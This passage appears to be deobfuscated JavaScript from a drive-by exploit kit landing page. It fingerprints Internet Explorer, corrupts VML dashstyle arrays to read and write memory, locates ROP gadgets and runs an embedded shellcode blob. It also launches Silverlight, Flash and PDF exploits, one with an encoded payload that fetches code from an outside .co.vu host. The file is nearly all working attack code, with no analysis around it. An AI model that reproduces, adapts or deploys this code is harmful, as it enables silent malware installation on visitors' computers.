- var v2 = "<T76XLI47Qu:oval><T76XLI47Qu:stroke id='Psw8A'></T76XLI47Qu:stroke></T76XLI47Qu:oval>";
- document.body.insertAdjacentHTML('afterbegin', v1);
- document.body.insertAdjacentHTML('afterbegin', v2);
- aha = [];
- sec = [];
- jay = [];
- bin = [];
- ewe = null;
- pen = null;
- bel = null;
- gum = null;
- toy = null;
- met = null;
- lye = null;
- mim = null;
- vim = null;
- mun = null;
- jet = null;
- duo = null;
- lib = null;
- cat = null;
- gee = null;
- aff = null;
- aas = null;
- function bam() {
- var m, g, d, j, l;
- try {
- j = navigator.userAgent.toLowerCase();
- m = /MSIE[\/\s]\d+/i.test(j);
- d = /WOW64;/i.test(j);
- g = /Win64;/i.test(j);
- l = /Trident\/(\d)/i.test(j) ? parseInt(RegExp.$1) : null;
- if (!g && m && l && (l == 6 || l == 5 || l == 4)) {
- pen = l;
- bel = d;
- return true
- }
- } catch (exc) {}
- return false
- }
- function mid(m, v, d) {
- var u;
- if (m.length < v.length) {
- return -1
- }
- if (d) {
- if (m.substr(m.charCodeAt(0) == 0 ? 1 : 0, v.length) == v) {
- return 0
- }
- } else {
- u = m.length - v.length;
- if (m.charCodeAt(m.length - 1) == 0) {
- u++
- }
- if (m.substr(u, v.length) == v) {
- return u
- }
- }
- return -1
- }
- function rap(j) {
- var g, m, t;
- t = '';
- for (m = 0; m < j.length; m++) {
- g = j.charCodeAt(m);
- t += String.fromCharCode(g & 0xff);
- t += String.fromCharCode((g & 0xff00) >> 8)
- }
- return t
- }
- function tet(p) {
- var r, j;
- r = '';
- if (p.length % 2) {
- p += unescape('%00')
- }
- for (j = 0; j < p.length; j += 2) {
- r += '%u';
- r += ope(p.charCodeAt(j + 1), 2);
- r += ope(p.charCodeAt(j), 2)
- }
- return r
- }
- function waw(q) {
- return rap(unescape(owl(q)))
- }
- function owl(v) {
- var j, k;
- k = v & 0xFFFF;
- j = (v >> 16) & 0xFFFF;
- return '%u' + ope(k, 4) + '%u' + ope(j, 4)
- }
- function tee(f) {
- gum.dashstyle.array.item(0x44) = f;
- return sec[toy].marginLeft
- }
- function ope(u, j) {
- var k;
- k = u.toString(16);
- while (k.length < j) {
- k = '0' + k
- }
- return k
- }
- function gal(u) {
- var y;
- y = '';
- if (u.length > 1) {
- y = ope(u.charCodeAt(1), 4) + ope(u.charCodeAt(0), 4)
- } else {
- y = ope(u.charCodeAt(0), 4)
- }
- return parseInt(y, 16)
- }
- function gan(t) {
- var h, b, a;
- for (a = 0; a < 3; a++) {
- h = tee(t + a);
- if (h) {
- b = gal(h);
- b <<= a * 8;
- return b
- }
- }
- return 0
- }
- function hen() {
- var j, q, z, r;
- r = gan(0x7ffe0268) & 0x0f;
- q = r ? gan(0x7ffe0264) : null;
- z = gan(0x7ffe026c);
- j = gan(0x7ffe0270);
- if (z == 5 && (j == 1 || j == 2) && q == 1) {
- return 1
- } else if (z == 6 && j == 0 && q == 1) {
- return 2
- } else if (z == 6 && j == 1 && q == 1) {
- return 3
- } else {
- return 0
- }
- }
- function gor() {
- return bel ? gan(0x7ffe0340) : gan(0x7ffe0300)
- }
- function yup(l) {
- var n, v, o, i;
- i = null;
- if (l) {
- l &= 0xffff0000;
- while (1) {
- if ((gan(l) & 0xffff) == 0x5a4d) {
- i = l;
- break
- }
- l -= 0x10000
- }
- if (i) {
- n = i + gan(i + 0x3c);
- if (gan(n) == 0x4550) {
- v = gan(n + 0x1c);
- o = gan(n + 0x2c);
- if (v && o) {
- return {
- a: i + o,
- b: i + o + v
- }
- }
- }
- }
- }
- return null
- }
- function sow() {
- var p, u, p, d, p;
- for (p = 0; p < 0x400; p++) {
- aha[p] = document.createElement('T76XLI47Qu:shape');
- document.body.appendChild(aha[p])
- }
- gum = document.getElementById('FSIK1pVI');
- for (p = 0; p < 0x400; p++) {
- sec[p] = aha[p]._vgRuntimeStyle
- }
- for (p = 0; p < 0x400; p++) {
- sec[p].rotation;
- if (p == 0x300) {
- gum.dashstyle = '1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44'
- }
- }
- lye = gum.dashstyle.array.length;
- try {
- gum.dashstyle.array.length = 0 - 1
- } catch (exc) {
- return false
- }
- for (p = 0; p < 0x400; p++) {
- sec[p].marginLeft = 'a';
- d = gum.dashstyle.array.item(0x44);
- if (d > 0) {
- met = d;
- toy = p;
- return true
- }
- }
- return false
- }
- function tat() {
- if (gum) {
- if (met) {
- gum.dashstyle.array.item(0x44) = met
- }
- gum.dashstyle.array.length = lye
- }
- }
- function opt() {
- var g, s, a, n, p, t, m, b, x, h, w, v, k, j, z, l, c, f, y, i, r, u, o;
- m = hen();
- if (m == 0) {
- return
- }
- j = gor();
- if (!j) {
- return
- }
- l = yup(j);
- if (!l) {
- return
- }
- n = unescape('%94%c3');
- c = unescape('%5a%c3');
- o = unescape('%ff%06%c3');
- r = unescape('%ff%07%c3');
- s = unescape('%5e%c3');
- u = unescape('%5f%c3');
- y = null;
- z = null;
- if (bel) {
- y = unescape('%b8%4d');
- z = unescape('%33%c9%8d%54%24%04%64%ff%15%c0')
- } else {
- if (m == 1) {
- y = unescape('%b8%89')
- } else if (m == 2) {
- y = unescape('%b8%d2')
- } else if (m == 3) {
- y = unescape('%b8%d7')
- }
- z = unescape('%ba%00%03%fe%7f%ff%12%c2%14')
- }
- b = null;
- h = null;
- t = null;
- f = null;
- v = null;
- x = l.a;
- i = l.b;
- while (x < i) {
- a = tee(x);
- if (a) {
- p = null;
- k = rap(a);
- if (!cat && (v || (p = mid(k, y, false)) != -1)) {
- if (!v) {
- v = x + p
- } else if (mid(k, z, true) != -1) {
- cat = v
- } else {
- v = null
- }
- }
- if (!duo && (p = k.indexOf(n)) != -1) {
- duo = x + p
- }
- if (!lib && (p = k.indexOf(c)) != -1) {
- lib = x + p
- }
- g = (b && t);
- w = (h && f);
- if (!g) {
- if (!b && (p = k.indexOf(o)) != -1) {
- b = x + p
- }
- if (!t && (p = k.indexOf(s)) != -1) {
- t = x + p
- }
- }
- if (!w) {
- if (!h && (p = k.indexOf(r)) != -1) {
- h = x + p
- }
- if (!f && (p = k.indexOf(u)) != -1) {
- f = x + p
- }
- }
- if (duo && lib && cat && (g || w)) {
- break
- }
- x += k.length
- }
- x += 2
- }
- if (g || w) {
- if (g) {
- gee = b;
- aff = t
- } else {
- gee = h;
- aff = f
- }
- }
- return (duo && lib && cat && gee && aff)
- }
- function sel() {
- var u, n, o, w;
- mim = document.getElementById('Psw8A');
- for (w = 0; w < 0x400; w++) {
- jay[w] = aha[w]._anchorRect;
- if (w == 0x300) {
- mim.dashstyle = '1 2 3 4'
- }
- }
- u = mim.dashstyle.array.length;
- try {
- mim.dashstyle.array.length = 0 - 1
- } catch (exc) {
- return null
- }
- n = mim.dashstyle.array.item(6);
- o = mim.dashstyle.array.item(7);
- if (n > 0 && o > 0 && mim.dashstyle.array.item(8) == 1) {
- vim = n;
- mun = o;
- jet = u;
- return true
- }
- mim.dashstyle.array.length = length;
- return false
- }
- function mor() {
- if (mim && mun && jet) {
- mim.dashstyle.array.item(7) = mun;
- mim.dashstyle.array.length = jet
- }
- }
- function hun() {
- var a, g, x, q, u, t, i;
- x = yup(vim);
- if (!x) {
- return false
- }
- a = unescape('%8b%01%ff%50%04');
- i = x.a;
- g = x.b;
- while (i < g) {
- q = tee(i);
- if (q) {
- u = null;
- t = rap(q);
- if ((u = t.indexOf(a)) != -1) {
- aas = i + u;
- return true
- }
- i += t.length
- }
- i += 2
- }
- return false
- }
- function kaf() {
- var l;
- l = 'AB';
- while (l.length < 0x40000) {
- l += l
- }
- return l.substring(0, 0x3FFED) + 'XXX'
- }
- function bug() {
- var d, v, c;
- c = pen == 6 ? '%8d%76%04' : '%90%90%90';
- v = pen == 6 ? '%f8' : '%fc';
- d = pen == 6 ? '%f0' : '%f4';
- return unescape('%eb%1f%60%8b%44%24%20%ff%d0%61%8b%75%08' + c + '%c7%06' + waw(mun) + '%8d%65' + v + '%8b%45' + d + '%83%e8%08%ff%e0%e8%dc%ff%ff%ff')
- }
- function peh() {
- var n, c, s, v, a, j, h, q;
- gum.dashstyle.array.item(0x44) = met;
- a = kaf();
- v = bug();
- n = tet(ewe);
- for (q = 0; q < 7; q++) {
- sec[toy].marginLeft = a;
- h = met = gum.dashstyle.array.item(0x44);
- j = h + a.length * 2;
- s = unescape(owl(j + 4) + owl(j + 0x0c) + owl(aas) + owl(lib) + owl(duo) + owl(aff) + owl(j + 0x41) + owl(gee) + owl(aff) + owl(j + 0x4e) + owl(gee) + owl(cat) + owl(j + 0x54) + owl(0xffffffff) + owl(j + 0x48) + owl(j + 0x4c) + owl(0xffffff40) + owl(j + 0x4F) + owl(j + 0x54) + owl(0xffff0400) + owl(0x41414141) + tet(v) + n);
- sec[toy].marginLeft += s;
- c = gum.dashstyle.array.item(0x44);
- if (h == c) {
- return j
- }
- }
- return null
- }
- function ty(s) {
- b = '';
- for (i = 0; i < (s.length / 2); i++) {
- b += String.fromCharCode('0x' + s.substr(i * 2, 2));
- }
- return b;
- }
- function man() {
- var h, q;
- if (!bam()) {
- return
- }
- if (!sow()) {
- return
- }
- if (!opt()) {
- return
- }
- if (!sel()) {
- return
- }
- if (!hun()) {
- return
- }
- q = peh();
- if (!q) {
- return
- }
- mim.dashstyle.array.item(7) = q;
- for (h = 0; h < 0x400; h++) {
- bin[h] = document.createElement('div');
- bin[h].classname = jay[h]
- }
- return
- }
- function nib(d) {
- ewe = d;
- man();
- tat();
- mor();
- return
- };
- jo = ty("60EB1358B97E030000498034081C85C975F7FFD061C3E8E8FFFFFFF5171F1C1C424995F97473721C1C74696E70714874925212F0740BD63772F4481E1C1C45457479F353194CF48C1E1C1C4C761A761C74071AD41174FA266B32F42F1E1C1C2DC7AB0C765C4F4F761C7448D6B38D740BD63772F4061E1C1C8B747D9DC5D3740BD63772F4161E1C1C201A600C4F4BF4A11C1C1C9CE03C6118761DF71E761C4A4BF4991C1C1C4A91685B1AF4731C1C1C99DC694A76174555684C4D9F61E41D68064AF48F1D1C1C99DC69062DDC78975C04975C2821F81E1C1C69C74AF4CE1C1C1C99DC68CD45422DDC5A245AE369E6241A69B04B5B5B7A251B69E5DB1B271C2D1C916B1A43F4091C1C1CD5DF761C76E2748473532174EEC768B1F4681D1C1C2DD54D4D4F4A4B4DE349E0DF4995F9761C74391C4F1C95FCE369104CE369147462569FCB74EEC768B1F45A1D1C1CD5DE141C4995F94A4BA26BF7173D4C48761476E37413BB02454AF43B1D1C1C468DFF209761144C48E369104B76054E744672C7C74AF4101D1C1C8D44FF3DE32B74D1906BED4AF4E71C1C1C13AA14554DE32B742E621A3C4AF4F51C1C1C97148D4342D5DE141C4A4B4995F997690C4A5A7A9F221C69E591621FF40D1C1C1C337F3C6F687D6E683C3E3E3C3E396F3E1C4BF455E3E3E391685B1E4B4A7462569FCB74EEC768B1F4801C1C1C76204535D09161D84D4B2DDCEFB643931B766F74721C7D1C746E1C691C957B10741DE9097E741AFEB12EF4711C1C1C955B14F40C1C1C1C7F1C711C781C321C791C641C791C1C1C935B0C956B084B74C1C432E074E66689F8F4231C1C1CD54342DE181C4995F976484535D04B9161B04B2DDCEFB64391530C7658931D4B4D4C4C4C4C4C4C4CE369147494E2AF0A740BD63772F4191C1C1C43D5DE181C45F4151C1C1C4CF4211C1C1C4DE3FC7C2DDC78974C2C974E10974E08976E342DE32DDCB05A99DC6811207D601E303CDDD3111DDBF7F727603838975E0C970E69C7955838007DDE181C7C97703838975920974819641DF697560497463C1DF7FF28559728971DF22DE32DDCE0B098DC681BDDD3111DDBF7E82760383469FD9746381DF77A9710579746001DF79718971DF4955838007DDE141CF4ECE0E3E37468686C26333371757972667D71757F74796E787379777273327F73326A69337A2E2429792E2E7E7F2E69696A332D282D292A2D2A2A2A2C332940642C2C2C252C2B2C292928292D2978292A297E2C2D2C7E2C2F292D2C2C292F292F297F2C292C29272D272A1C1C1C000000");
- try {
- document.body++
- } catch (exc) {
- nib(jo)
- }
- }
- function silver_run() {
- ffbgrnth5we('<form id="form1" runat="server" style="height: 100%"><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="/f285e22b5c88c2uuv/1415616660" /><param name="initParams" value="tuti=YOgGAAAAYemDAgAAgeyQAAAAU1VWV7lSEW9Lx0QkFHVybG3HRCQYb24uZGbHRCQcbGzGRCQeAMdEJCBhZHZhx0QkJHBpMzLHRCQoLmRsbMZEJCwA6FoBAAC5EmIpfolEJEjoTAEAALlrlNv/i+joQAEAAIv4uaUYOlqJfCRE6DABAACL2I1EJBRQiVwkOP/TjUQkIFD/07mGkip66BIBAAC5ArBphIlEJDjoBAEAALlDkus2iUQkQOj2AAAAiUQkPOi/AQAAiUQkMDP2ihwGgPsxdAmA+zIPhcsAAABqQGgAEAAAaAQBAABqAIPGAv/XM9JSUov4i0QkOGgEAQAAVwPGUFL/VCRUgPsxdXZqRDPbWolcJBCLyo1EJFyIGEBJdfpqEFmNRCRMiBhASXX6jUQkEFBoiwAAAGr/iVQkaP9UJESNRCRMUI1EJGBQU1NTU1NTU1f/dCQ4/1QkbDlcJBB0Bv90JBD/1TlcJFB0Bv90JFD/1TlcJEx0Ev90JEz/1esKgPsydQVX/1QkOItEJDADxlD/VCRMi3wkREAD8ItEJDDpJP///19eXVuBxJAAAADDg+wQZKEwAAAAU4tADFVWi3AMV4tWGIlMJBiF0g+EjQAAADPti0I8i34wi1wQeIvNiVwkEIXbdGrByQ2KBzxhD77AfAODweCDxwIDyGY5L3Xni0QTIAPCg3wTGACL/XZCi92LKAPqg8AEiUQkHIpFAMHLDQ++wAPYRYpFAITAdfCJXCQUi0QkFItcJBADwTtEJBh0JYtEJBxHagBdO3wTGHK+izaLVhiF0g+Fdf///zPAX15dW4PEEMOLRBMkjQR4D7cMEItEExyNBIiLBBADwuvf6AAAAABYg8AKw8P/////MTtodHRwOi8vbWllbnphbWljaGVyZG9la25vLmNvLnZ1L2YyODVlMjJiYzJ1dXYvMTQxNTYxNjY2MC84ADE7aHR0cDovL21pZW56YW1pY2hlcmRvZWtuby5jby52dS9mMjg1ZTIyYmMydXV2LzE0MTU2MTY2NjAvOC8yAAAAAAA="/></object></div></form>');
- }
- function flash_run(fu, fd) {
- var f_use = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1">';
- f_use = f_use + '<param name="movie" value="' + fu + '" />';
- f_use = f_use + '<param name="play" value="true"/>';
- f_use = f_use + '<param name=FlashVars value="exec=' + fd + '" />';
- f_use = f_use + '<!--[if !IE]>-->';
- f_use = f_use + '<object type="application/x-shockwave-flash" data="' + fu + '" allowScriptAccess=always width="1" height="1">';
- f_use = f_use + '<param name="movie" value="' + fu + '" />';
- f_use = f_use + '<param name="play" value="true"/>';
- f_use = f_use + '<param name=FlashVars value="exec=' + fd + '" />';
- f_use = f_use + '<!--<![endif]-->';
- f_use = f_use + '<!--[if !IE]>--></object><!--<![endif]-->';
- f_use = f_use + '</object>';
- ffbgrnth5we(f_use);
- }
- function pdf_run() {
- fg("/f285e22bdb7fc2uuv/1415616660", "53", "81");
- }
- if (c_a == 0) {
- if ((s_version[0] > 0 && s_version[0] < 5) || (s_version[0] == 5 && s_version[1] == 0 && s_version[1] <= 61118)) {}
- if (CheckVersion11(f_version) || CheckVersion12(f_version) || CheckVersion13(f_version) || CheckVersion14(f_version) || CheckVersion15(f_version)) {
- }
- if (java_run > 0) {
- asfwe(java_run);
- }
- if ((p_version[0] == 8) || (p_version[0] == 9 && p_version[1] <= 3)) {
- pdf_run();
- }
- msie_run();
- }
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